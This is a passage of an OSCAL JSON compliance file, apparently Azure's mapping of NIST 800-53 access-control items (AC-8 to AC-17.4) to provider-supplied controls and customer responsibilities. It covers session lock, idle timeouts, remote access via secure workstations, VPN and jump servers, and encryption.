statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cfeccec6-56fe-408c-a613-725dfba9b0f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-8_smt.b","by-components":[{"uuid":"7c4993f2-fb67-49db-bc7d-21d02d076622","export":{"provided":[{"uuid":"70a83291-8d75-4f30-98c1-4175601e1911","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-055"}],"description":"The warning banner is displayed during the logon sequence. Microsoft users must take explicit action to complete the login sequence._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a6afcf46-e693-4d31-8d72-e57d5276776a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-055"}],"description":"The customer is responsible for requiring users to acknowledge the system use notification (described in AC-08.a) on customer-deployed resources.","provided-uuid":"70a83291-8d75-4f30-98c1-4175601e1911"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fc43e19d-1810-4f7e-9660-df9bd930ced2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-8_smt.c","by-components":[{"uuid":"913a98a1-3c0e-4a13-9dc3-ac50a7b6f93e","export":{"provided":[{"uuid":"a8823697-d513-44ca-8616-88f866a4dcbf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-056"}],"description":"Azure does not display a warning banner on customer interfaces. Based on review of requirements and discussions with Azure environment service owners, this control is not applicable to the customer-facing components of the Azure environment as Azure is a commercial service and customers are responsible for implementing this control either at the proxy level, the application/client level, or on their ADFS server that authenticates their users who access the Azure environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"183f30a5-4d48-454c-b256-f1077124bb00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-056"}],"description":"The customer is responsible for displaying a system use notification on all publicly accessible customer-deployed resources. The notification will include (if any) descriptions of monitoring, recording, or auditing that may be configured, and the description of authorized uses of the system.","provided-uuid":"a8823697-d513-44ca-8616-88f866a4dcbf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"de74e68c-2473-46c0-a61c-57fc3e01d05c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-10","statements":[{"uuid":"4bf4dccf-4ead-4381-9a13-b9c655b04480","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-10_smt","by-components":[{"uuid":"e04791d0-636e-496e-b8ed-9d6bbf010bc4","export":{"provided":[{"uuid":"11f4c8ea-6ca6-43ef-a2bc-2bf411a5f6c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-057"}],"description":"Servers Azure does not currently limit the number of concurrent sessions to production operating systems. However, users can only log in via Remote Desktop Protocol (RDP) once with their credentials. This limits sessions to one session per host, per user. Additionally, the following compensating access control measures are in place: multifactor authentication is required for all access to Azure systems for Azure personnel; account lockout is enforced for invalid login attempts at the smart card level; access to administrative interfaces is limited to approved access through role-based access control, ensuring that the risk of exploit by other than specifically designated personnel is low to non-existent. Conversely, prohibiting concurrent sessions would hinder Azure administration and maintenance. Azure requires specialized, non-public software tools and utilities. These create dedicated sessions directly associated with the tool. Trouble investigation such as running diagnostics require multiple instances of these tools, often for extended periods. Network Devices Accessing network devices in the Azure environment requires users to establish a connection to the Azure Network Hop Boxes or to connect to the VPN before connecting to the Azure environment. When establishing a connection to a network device, a user must authenticate with a physical Azure-issued smart card before establishing a session to an Azure domain server. The multifactor authentication provided by the physical smart card and PIN combination requirement provides additional security when access to network devices is attempted. Concurrent sessions are implemented at the Azure Network Hop Boxes or to connect to the VPN for the network devices versus at the individual device layer. Software Service team web applications enforce a limit of one session per browser cookie for all customer user sessions."}],"responsibilities":[{"uuid":"cc48d8fe-bea8-43e6-98b1-257f810c6061","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-057"}],"description":"The customer is responsible for defining and enforcing the limit of concurrent sessions for each customer-controlled account and/or account type.","provided-uuid":"11f4c8ea-6ca6-43ef-a2bc-2bf411a5f6c0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"71624a75-54c4-4a9c-993e-386b8ad54586","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-11","statements":[{"uuid":"8f59c151-01fd-4729-b244-ce0744040ace","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-058"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-11_smt.a","by-components":[{"uuid":"1a2d6c81-d0e1-44f1-8505-eb87b737e9ac","export":{"provided":[{"uuid":"5e534991-c905-49e9-9524-8cc2510649a2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-058"}],"description":"Core Services Engineering and Operations (CSEO) is responsible for corporate domain settings that enforce a session lock of at most fifteen (15) minutes on Corporate Network (CorpNet) workstations. Secure Admin Workstations (SAWs) have session lock settings of ten (10) minutes. Access to Azure is only possible from Core Services Engineering and Operations (CSEO)-issued SAWs. All access requires the user to utilize a SAW, unless there is a Break-Glass scenario, in which case the CorpNet workstation is used. In addition to the SAW or CorpNet workstations, pulse secure VPN connection is utilized to access production assets. The pulse secure VPN is configured to conduct session lock after 60 minutes of inactivity."}],"responsibilities":[{"uuid":"3b881c91-35d2-464d-8578-e7374fa29eee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-058"}],"description":"The customer is responsible for preventing further access to the system by initiating a device lock after an organization-defined time period of inactivity or requiring the user to initiate a device lock before leaving the system unattended.","provided-uuid":"5e534991-c905-49e9-9524-8cc2510649a2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"364e3aa0-caad-498d-a77e-0440e3cb3436","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-059"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-11_smt.b","by-components":[{"uuid":"56f551ed-09ce-4e2d-bcc6-d0307eb04195","export":{"provided":[{"uuid":"c9c66d96-334e-4e99-ae40-eb2092ae2100","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-059"}],"description":"The only way for the user to end the session lock is by reestablishing access using their credentials on their CorpNet workstation or SAW and pulse secure VPN."}],"responsibilities":[{"uuid":"ca730148-2d7f-4313-95b3-a39b49d07e0a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-059"}],"description":"The customer is responsible for retaining the device lock until the user reestablishes access using established identification and authentication procedures on customer-deployed resources.","provided-uuid":"c9c66d96-334e-4e99-ae40-eb2092ae2100"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bd360a16-0795-4835-98d5-1f559744d169","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-11.1","statements":[{"uuid":"db934de6-1549-42ed-aa52-4aa315f15cd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-060"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-11.1_smt","by-components":[{"uuid":"c6cf711d-3056-4e2e-8100-40e316bb787e","export":{"provided":[{"uuid":"e48c61ca-6591-44c8-a635-07c766cdc33c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-060"}],"description":"Azure components rely on the Microsoft CorpNet AD session to perform lock functionality and display a blank login screen when a session is locked._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cdebf2b7-79d8-434b-947e-88154b5bdda7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-060"}],"description":"The customer is responsible for concealing previously-visible information when a session lock is initiated on customer-deployed resources.","provided-uuid":"e48c61ca-6591-44c8-a635-07c766cdc33c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"912721ef-52d3-4c81-adb4-353d2a3badaa","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-12","statements":[{"uuid":"88793bd1-098d-43af-99df-262b9b9f565d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-12_smt","by-components":[{"uuid":"07283d1f-601d-492a-848b-d314e0dc4359","export":{"provided":[{"uuid":"9d15e47b-7697-4c4e-9303-3978d4c50643","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-061"}],"description":"Azure automatically terminates Microsoft user sessions upon receiving a logout request from the user. Secure Admin Workstations (SAWs) require reauthentication after at most ten (10) minutes of user inactivity._x000D_ _x000D_ VPN_x000D_ _x000D_ The SAW VPN terminates inactive sessions after three hundred sixty (360) minutes of inactivity, and the non-SAW VPN terminates inactive sessions after sixty (60) minutes of inactivity._x000D_ _x000D_ _x000D_ Servers_x000D_ _x000D_ RDP and SSH idle timeout inherit the settings of the target server. Azure servers are configured to terminate idle sessions after fifteen (15) minutes of inactivity._x000D_ _x000D_ Network Devices_x000D_ _x000D_ SSH idle timeout inherits the settings of the target network device. Azure network devices are configured to terminate inactive sessions after sixty (60) minutes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"159e8ce6-104b-40d9-aa02-e3d2b4d8fb03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-061"}],"description":"The customer is responsible for defining and enforcing events or conditions requiring the termination of a user session on customer-deployed resources.","provided-uuid":"9d15e47b-7697-4c4e-9303-3978d4c50643"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"85cf5a5d-7511-4757-830e-5774131c77d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-14","statements":[{"uuid":"a69d51e4-0fb8-4d96-be13-27d730fe0d89","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-14_smt.a","by-components":[{"uuid":"6e929753-9f6f-476a-9450-07bc0e131ccc","export":{"provided":[{"uuid":"15e63a2f-b2f5-42f6-8730-9dd7ed3816bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-062"}],"description":"The only actions permitted by Azure to be performed without identification and authentication are accessing the public Feature Descriptions, Developer Documents, Legal, Privacy Statement, Help, and Language Preference options on the customer facing welcome page. On the welcome page the user enters his or her email address, at which point Active Directory Federation Services (ADFS) refers the user back to the customer-controlled federated authentication portal._x000D_ _x000D_ Service teams also make aspects of their services consumable as needed. For instance, Azure Active Directory (AAD) DNS responds to unauthenticated DNS queries by design, as this is required to be compliant with the DNS specification and to ensure customers can successfully resolve AAD URLs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7b453ce3-7bc1-4824-9345-b10b14e7bfca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-062"}],"description":"The customer is responsible for identifying actions that can be performed on the customer-deployed resources without identification or authentication (e.g., such as viewing a publicly accessible web page).","provided-uuid":"15e63a2f-b2f5-42f6-8730-9dd7ed3816bd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f6d3f557-0035-4245-82dc-573f499db23d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-063"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-14_smt.b","by-components":[{"uuid":"84632808-6abc-46c0-8e73-2b2bb0b71a9c","export":{"provided":[{"uuid":"4f0e0bd0-4e55-4896-9a0e-719b2c3eb760","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-063"}],"description":"The information in the Feature Descriptions, Developer Documents, Legal, Privacy Statement, Help, and Language Preference is either legally required or foundational to an internet-facing service and none of it impacts the security of the system if disclosed. Service teams also make aspects of their services consumable as needed. For instance, Azure Active Directory (AAD) DNS responds to unauthenticated DNS queries by design, as this is required to be compliant with the DNS specification and to ensure customers can successfully resolve AAD URLs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f73e6198-6f27-4241-8a38-821488f1e800","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-063"}],"description":"The customer is responsible for providing documentation for user actions not requiring identification or authentication on customer-deployed resources.","provided-uuid":"4f0e0bd0-4e55-4896-9a0e-719b2c3eb760"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e7140000-2683-4c44-b488-84eec73549e7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17","statements":[{"uuid":"d78a8a7f-d59b-498a-a910-dafd74b08003","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-064"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17_smt.a","by-components":[{"uuid":"01387e4f-327a-44ff-8faa-5c7f4a1ff5cc","export":{"provided":[{"uuid":"d78bf702-222a-40b5-9704-9584da2a44b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-064"}],"description":"There are several authentication steps to be able to access Azure resources remotely. Authorized Microsoft personnel utilize Microsoft-issued Secure Admin Workstations (SAWs) and connect remotely to Azure from the Corporate Network (CorpNet). Microsoft internal user connections originate in CorpNet passing via the CorpNet Firewall through Azure-managed load balancers. Users are identified by a unique Active Directory (AD) identifier on CorpNet with multifactor authentication. If a user is not at a physical Microsoft location, remote access to CorpNet also requires corporate MSFTVPN connectivity using Microsoft-issued smart card certificates and PIN-based authentication. Once authenticated through CorpNet, Microsoft personnel access the Azure environment in one of two ways - via the VPN or via the Jumpbox, Debug Server, and Network Hop Box infrastructure. The VPN provides direct access via RDP and SSH to the assets. Alternatively, personnel can log into Jumpboxes and Debug servers for server access and Network Hop Boxes for network device access. Once through the VPN, Jumpbox, Debug Server, or Network Hop Box, the user can access Azure assets. Jumpboxes and Debug Servers Jumpboxes are servers in Azure datacenters that provide remote access paths into the Azure production environment. Azure users log into these Jumpboxes to perform routine maintenance, emergency repairs, diagnosis, and administration of Azure production environment. Access to the Jumpboxes via RDP is restricted to CorpNet and requires multifactor authentication using the user's AD credential and a smart card. Access to Jumpboxes is restricted to designated OneIdentity security groups. Similar to Jumpboxes, Debug servers are non-domain-joined servers located entirely within the Azure production environment. users connect to Debug servers via RDP using specific, CorpNet-exposed endpoints before accessing Azure assets. Access to Debug servers is similarly restricted to designated OneIdentity security groups. Network Hop Boxes Network Hop Boxes are the network device equivalent of the server Jumpboxes for Azure network devices. VPN Personnel utilize the following methods via SSL VPN to access Azure production assets: * Public Key Infrastructure (PKI) to enable secure communication between the certificate server to the target asset by utilizing CRL Validation * Leveraging Microsoft Entra ID (formerly AAD) through utilization of multifactor authentication via smart card from the identity server to the target asset"}],"responsibilities":[{"uuid":"81d26126-ea46-4550-9b44-2b54f25870cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-064"}],"description":"The customer is responsible for documenting remote access requirements to customer-deployed resources, including usage restrictions, configuration and connection requirements, and implementation guidance for all remote access types.","provided-uuid":"d78bf702-222a-40b5-9704-9584da2a44b1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8f6bafe1-03c9-4ad0-887d-7605fd63e378","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-065"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17_smt.b","by-components":[{"uuid":"c1cb1657-63b6-4e13-8ad0-2e5be14543cb","export":{"provided":[{"uuid":"30c3e37d-31d8-46f3-80ac-7a2ca413d848","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-065"}],"description":"Azure authorizes remote access for Azure service team users. Before service team personnel can connect to Azure remotely, they must first be approved for remote access by an authorized manager. This process is automatically enforced by OneIdentity."}],"responsibilities":[{"uuid":"8359d589-ddb4-4e63-9f87-ddc4d09eaec5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-065"}],"description":"The customer is responsible for authorizing each type of remote access to the system prior to allowing such connections.","provided-uuid":"30c3e37d-31d8-46f3-80ac-7a2ca413d848"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"80ea5baa-6094-460f-820e-cfaabc5d759e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.1","statements":[{"uuid":"86b53517-0f6f-4ecd-b955-666c78b3eb5c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-066"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.1_smt","by-components":[{"uuid":"ac4d3f46-7508-4696-a107-1686e80d9445","export":{"provided":[{"uuid":"e93dd4c2-85b6-4fa2-a202-6a5fe33d9366","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-066"}],"description":"Azure utilizes Azure Security Monitoring (ASM) and SCUBA for monitoring logs for unauthorized remote access to the information system. ASM and SCUBA look for indicators of attempted security attacks and indicators of compromised systems. In addition, ASM and SCUBA look for indicators of attempted security attacks and indicators of compromised systems. Any unauthorized or otherwise unusual remote access to the information system automatically generates an Incident Management (IcM) ticket to the service owners or the Security Response Team for investigation. Geneva Monitoring is configured to collect remote access events from the Windows Event log. These events are uploaded to the security information and event management tools. These events are processed by the Security Response Team to ensure normal usage of the system, and to examine deviations from this range. Unusual activity is flagged for further review._x000D_ _x000D_"}],"responsibilities":[{"uuid":"326cd81f-d130-4ffc-8170-e5a81016e564","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-066"}],"description":"The customer is responsible for monitoring and controlling remote access methods for customer-deployed resources.","provided-uuid":"e93dd4c2-85b6-4fa2-a202-6a5fe33d9366"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"26f5f968-a7cc-48b6-8494-7bc02b12f753","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.2","statements":[{"uuid":"d1bfb28a-a39f-4923-aa3d-a020822266cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-067"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.2_smt","by-components":[{"uuid":"38466bef-fab8-4592-af62-6a8697b878d8","export":{"provided":[{"uuid":"17ed834d-771c-45a5-95c1-2cfae5bffedb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-067"}],"description":"For all asset types, Azure uses cryptographic controls to protect the confidentiality, authenticity and integrity of sensitive data while in transit or at rest. To ensure confidentiality, Azure uses both symmetric and asymmetric keys for encrypting sensitive data to prevent access from unauthorized parties. For example, secrets such as the Storage Key are encrypted using the receiving component's public key prior to transmission. As part of the component's deployment, the private key is installed into the runtime environment by leveraging the Azure Certificate Store (WACS) functionality provided by the Fabric. The component uses the private key installed into the WACS to decrypt the secret._x000D_ _x000D_ To ensure integrity, Azure uses asymmetric keys to protect unauthorized modification to sensitive data during transmission across components. For example, a component might generate a file then compute a cryptographic checksum over that file's contents, then sign that checksum via its private key. Upon subsequent access of that file, the component first validates that the file's contents had not been modified by recomputing the checksum over the current file contents then verifying the signature, which only requires the public key._x000D_ _x000D_ Azure uses FIPS 140-2 validated cryptography for access. Azure Remote Desktop Protocol (RDP) and SSL VPN services are configured to use FIPS 140-2 validated TLS 1.2 encryption for access. Encryption is required for all connections. PKI certificates are utilized within Azure on the internal RD gateways and are obtained through the Azure PKI, and SSL certificates utilized by access solutions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"bb54aed9-abec-46b3-afe4-afa5f6676082","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-067"}],"description":"The customer is responsible for implementing cryptographic mechanisms (e.g., TLS) to protect remote access sessions to customer-deployed resources.","provided-uuid":"17ed834d-771c-45a5-95c1-2cfae5bffedb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"726d8749-5964-4ab1-80b8-4a8c46793f95","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.3","statements":[{"uuid":"b53c1f85-b546-4fb7-abfc-4aabfa77f345","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-068"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.3_smt","by-components":[{"uuid":"4ea9a175-0816-4c7d-99fa-36ef757e8b33","export":{"provided":[{"uuid":"788167f9-18ea-4717-9639-0a5e27438ba4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-068"}],"description":"Azure leverages AD to control access to Azure assets. Azure is protected using Microsoft-controlled AD security groups and requires multifactor authentication via smart cards at security boundaries, including at the VPN, Jumpboxes, Debug Servers, and Network Hop Boxes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e9d6f9d3-4fd6-4cba-91d4-bac6433fd452","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-068"}],"description":"The customer is responsible for routing remote access connections to customer-deployed resources through managed network access control points.","provided-uuid":"788167f9-18ea-4717-9639-0a5e27438ba4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0424770f-e4e5-4b52-bc16-75c546c6a28f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.4","statements":[{"uuid":"fe4e545f-1b9e-4639-a746-6560c2d5118f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-069"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.4_smt.a","by-components":[{"uuid":"fd8190fe-5a12-4a7c-978d-575eefe385da","export":{"provided":[{"uuid":"6e56ae10-c217-407b-8ba8-fa3c6d81940f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-069"}],"description":"Azure authorizes the execution of all commands to users with elevated access who have been approved by an authorized manager and have a compelling operational need for access to an asset. Because Azure support personnel do not have physical access to the datacenters, there is a business requirement for those personnel to have remote access to conduct their work on the geographically dispersed Azure datacenter assets."}],"responsibilities":[{"uuid":"1b8ad83c-aa5b-4785-b5d3-aacc1dae676a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-069"}],"description":"The customer is responsible for authorizing privileged commands and access to security-relevant information via remote access for customer-deployed resources.","provided-uuid":"6e56ae10-c217-407b-8ba8-fa3c6d81940f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c0c1ad75-3f98-4b65-a9e5-7d0589c11af9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-070"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.4_smt.b","by-components":[{"uuid":"76cedc9f-6fce-4d7b-87b9-b502ed5c7575","export":{"provided":[{"uuid":"b6253eab-758b-4bd8-b1b7-0380bf5f7f51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-070"}],"description":"Because Azure support personnel do not have physical access to the datacenters, there is a business requirement for those personnel to have remote access to conduct their work on the geographically dispersed Azure datacenter 